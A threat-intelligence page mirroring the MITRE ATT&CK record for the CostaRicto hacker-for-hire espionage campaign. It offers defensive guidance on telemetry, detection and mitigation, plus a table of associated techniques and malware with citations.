C0004: CostaRicto
CostaRicto was a suspected hacker-for-hire cyber espionage campaign that targeted multiple industries worldwide, with a large number being financial institutions. CostaRicto actors targeted organizations in Europe, the Americas, Asia, Australia, and Africa, with a large concentration in South Asia (especially India, Bangladesh, and Singapore), using custom malware, open source tools, and a complex network of proxies and SSH tunnels.[1]
Analyst context for executives and security teams
CostaRicto matters because ATT&CK describes it as a suspected hacker-for-hire cyber espionage campaign with worldwide targeting and many financial-institution victims. The defensive value is not a single indicator; it is validating whether the organization can see remote access abuse, proxy/tunnel command-and-control, transferred tools, scheduled tasks, PowerShell/offensive frameworks, and local data collection across the parts of the environment where those behaviors are relevant.
Executive priority
Treat this as a resilience and assurance use case for espionage-style intrusions: leadership should ask whether remote access, endpoint administration tools, egress paths, and sensitive-data locations are monitored well enough to support fast incident decisions. For financial services or globally distributed organizations, this campaign is useful for testing whether controls and audit evidence cover both commodity/open-source tooling and custom malware behaviors, rather than relying only on malware signatures.
Technical view
MITRE provides no campaign-level detection text, so SOC validation should be relationship-driven. The campaign is linked to PsExec, Tor, PowerSploit, PS1, CostaBricks, SombRAT, and techniques including External Remote Services, Scheduled Task, Network Service Discovery, Ingress Tool Transfer, Protocol Tunneling, Multi-hop Proxy, Data from Local System, and resource-development behaviors for domains, malware, and tools. Detection engineering should map these to available telemetry, especially Windows endpoint activity for PsExec, PowerSploit, scheduled tasks, and the listed Windows malware, plus network and remote-access logging for proxying, tunneling, Tor-like anonymity, and external service access.
Likely telemetry
- Remote access gateway, VPN, Citrix, WinRM/VNC or other external remote service authentication and session logs where deployed
- Endpoint process creation, command-line, script block or PowerShell logging, and parent-child process relationships
- Windows scheduled task creation, modification, and execution events
- Service creation or remote execution evidence associated with administrative tooling such as PsExec
- File creation/download events showing ingress tool transfer or staging of loaders/backdoors
Detection direction
- Validate coverage by behavior, not by campaign name: remote access abuse, tool transfer, scheduled task persistence/execution, PowerShell framework usage, network service discovery, local data access, and tunneled/proxied C2.
- Tune carefully for legitimate administration: PsExec, PowerShell, scheduled tasks, remote services, and SSH tunnels can be normal in enterprise operations, so detections should use context such as unusual source/destination pairs, new administrative relationships, abnormal timing, rare command lines, or unexpected egress paths.
- Check blind spots in encrypted and indirect network paths. Multi-hop proxies, Tor, and protocol tunneling reduce the value of simple IP reputation and may require DNS, proxy, flow, endpoint, and remote-access correlation.
- Use relationship context to hunt for combinations: externally accessed services followed by tool transfer, PowerShell or PsExec execution, scheduled task creation, service discovery, and local data access is more material than any single event.
- Because official detection guidance is not provided, require local baselining and validation with benign administrative activity before escalating detections into high-confidence alerts.
Mitigation priorities
- Prioritize governance and monitoring of external remote services, including strong authentication policy, least-privilege access, session logging, and rapid review of unusual access patterns.
- Restrict and monitor administrative execution paths such as PsExec, PowerShell, and scheduled tasks; separate legitimate administration from unmanaged or unexpected use.
- Harden egress controls and logging so proxy, Tor, SSH tunnel, and protocol tunneling activity can be investigated instead of disappearing into generic encrypted traffic.
- Limit unnecessary internal service exposure and monitor discovery activity that could support lateral movement or target selection.
- Protect high-value local data stores with access controls, logging, and data-staging detection so collection activity can be confirmed during response.
Analyst notes and limits
The supplied ATT&CK object is a campaign record, not a procedure-by-procedure incident report. Its strongest decision value is as a control validation scenario for outsourced/espionage-style operations using a mix of custom malware, open-source tools, proxies, and SSH tunnels. Financial institutions and globally distributed organizations should give it higher review priority only to the extent their local risk profile, remote access exposure, and telemetry gaps match the described behaviors.
MITRE lists no platforms or tactics directly on the campaign and provides no official detection text. Platform references come from related software and techniques only. The supplied data supports historical campaign characterization and behavior mapping, but not claims of current activity, attribution beyond the suspected hacker-for-hire description, specific victim exposure, or guaranteed detection coverage.
CostaRicto
CostaRicto was a suspected hacker-for-hire cyber espionage campaign that targeted multiple industries worldwide, with a large number being financial institutions. CostaRicto actors targeted organizations in Europe, the Americas, Asia, Australia, and Africa, with a large concentration in South Asia (especially India, Bangladesh, and Singapore), using custom malware, open source tools, and a complex network of proxies and SSH tunnels.[1]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1046 | Network Service Discovery | During CostaRicto, the threat actors employed nmap and pscan to scan target environments.CitationBlackBerry CostaRicto November 2020 |
| Enterprise | T1105 | Ingress Tool Transfer | During CostaRicto, the threat actors downloaded malware and tools onto a compromised host.CitationBlackBerry CostaRicto November 2020 |
| Enterprise | T1090.003 | Multi-hop Proxy Sub-technique | During CostaRicto, the threat actors used a layer of proxies to manage C2 communications.CitationBlackBerry CostaRicto November 2020 |
| Enterprise | T1053.005 | Scheduled Task Sub-technique | During CostaRicto, the threat actors used scheduled tasks to download backdoor tools.CitationBlackBerry CostaRicto November 2020 |
| Enterprise | T1588.002 | Tool Sub-technique | During CostaRicto, the threat actors obtained open source tools to use in their operations.CitationBlackBerry CostaRicto November 2020 |
| Enterprise | T1133 | External Remote Services | During CostaRicto, the threat actors set up remote tunneling using an SSH tool to maintain access to a compromised environment.CitationBlackBerry CostaRicto November 2020 |
| Enterprise | T1583.001 | Domains Sub-technique | For CostaRicto, the threat actors established domains, some of which appeared to spoof legitimate domains.CitationBlackBerry CostaRicto November 2020 |
| Enterprise | T1587.001 | Malware Sub-technique | For CostaRicto, the threat actors used custom malware, including PS1, CostaBricks, and SombRAT.CitationBlackBerry CostaRicto November 2020 |
| Enterprise | T1005 | Data from Local System | During CostaRicto, the threat actors collected data and files from compromised networks.CitationBlackBerry CostaRicto November 2020 |
| Enterprise | T1572 | Protocol Tunneling | During CostaRicto, the threat actors set up remote SSH tunneling into the victim's environment from a malicious domain.CitationBlackBerry CostaRicto November 2020 |
Groups, software, and campaigns
S0194: PowerSploit
PowerSploit is an open source, offensive security framework comprised of PowerShell modules and scripts that perform a wide range of tasks related to penetration testing such as code execution, persistence, bypassing anti-virus, recon, and exfiltration. [1] [2] [3]
S0183: Tor
Tor is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. Tor utilizes "Onion Routing," in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination. [1]
S0615: SombRAT
S0029: PsExec
S0614: CostaBricks
CostaBricks is a loader that was used to deploy 32-bit backdoors in the CostaRicto campaign.[1]
S0613: PS1
PS1 is a loader that was used to deploy 64-bit backdoors in the CostaRicto campaign.[1]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 7cbfc177d16d… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
BlackBerry CostaRicto November 2020
The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. Retrieved May 24, 2021.
Open source URL -
[2]
mitre-attack C0004Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.